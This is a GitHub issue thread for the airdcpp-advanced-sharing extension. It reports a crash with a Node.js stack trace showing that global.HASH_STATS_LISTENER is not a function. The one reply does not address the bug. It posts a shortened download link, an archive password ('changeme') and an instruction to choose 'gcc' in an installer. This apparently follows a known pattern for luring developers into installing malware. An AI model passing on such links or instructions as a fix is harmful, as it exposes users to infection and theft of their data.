### ISSUE TITLE
global.HASH_STATS_LISTENER is not a function

### ISSUE THREAD

**Issue by infectormp** [peps1/airdcpp-advanced-sharing#24]
Just got the error in airdc log `Extension airdcpp-advanced-sharing has exited`

### Crash log

```shell
TypeError: global.HASH_STATS_LISTENER is not a function
    at t.onShareRefreshCompleted (C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:78743)
    at EventEmitter.emit (node:events:519:28)
    at Object.handleMessage (C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:7743)
    at u.R [as onmessage] (C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:11768)
    at u.o [as dispatchEvent] (C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:128671)
    at u.m (C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:84149)
    at v.<anonymous> (C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:83837)
    at v.emit (node:events:519:28)
    at v.processFrame (C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:101764)
    at C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:97068

Node.js v20.17.0
```

### AirDC++ version and architecture (x86 or x64)

4.22b-38-g9817c

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
